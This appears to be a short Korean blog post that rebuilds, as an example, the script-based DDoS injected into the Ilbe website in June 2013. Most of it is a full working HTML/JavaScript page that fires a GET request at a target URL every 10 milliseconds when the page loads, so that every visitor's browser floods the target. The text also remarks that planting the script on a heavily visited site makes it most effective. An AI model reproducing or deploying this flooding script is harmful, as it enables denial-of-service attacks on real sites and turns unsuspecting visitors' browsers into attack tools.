<DDoS> Script Get Flooding Example

2013.6.25 일베(일간베스트) 사이트에 접속한 사용자에게 심어진 스크립트형 DDoS 형태를 예제로 만들어 봄

스크립트형 DDoS는 이용자 PC가 악성코드 감염유부와 상관없이,

방문만으로 감염됨 (감염이란 표현도 안맞긴 함), 즉 브라우저만 있으면 됨

스크립트 형이라 data packet을 정밀하게 제어하는 것은 어려움

그래도 GET, POST 등 있을건 있음

이를 통해 효과를 톡톡히 볼려면 이용자가 많이 방문하는 사이트에 감염시키는 것이 가장 효과적

<Script Get Flooding Example>

<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=euc-kr"> <title>Script Get Flooding Example</title> <script language="JavaScript"> <!-- var xmlHttp; var settingUrl = "http://~~~~~~~~~/"; /*Target*/ /*var starting = setInterval(startRequest, (2500 / 10000 | 0));*/ var starting = setInterval(startRequest, (10)); function createXMLHttpRequest() {     if(window.ActiveXObject) {         xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");     } else if(window.XMLHttpRequest) {         xmlHttp = new XMLHttpRequest();     } } function startRequest() {     createXMLHttpRequest();     xmlHttp.onreadystatechange = handleStateChange;     xmlHttp.open("GET", settingUrl, true);     xmlHttp.send(null);     count_temp.value = count_temp.value*1 + 1; } function handleStateChange() {     if(xmlHttp.readyState == 4) {         if(xmlHttp.status == 200) {             //alert("응답 : " + xmlHttp.responseText);         }     } } //--> </script> </head> <body> <h3>Script Get Flooding Example</h3> count : <input type=text id=count_temp value=1> <br/><br/> <a href="javascript:history.back();">뒤로</a> </body> </html>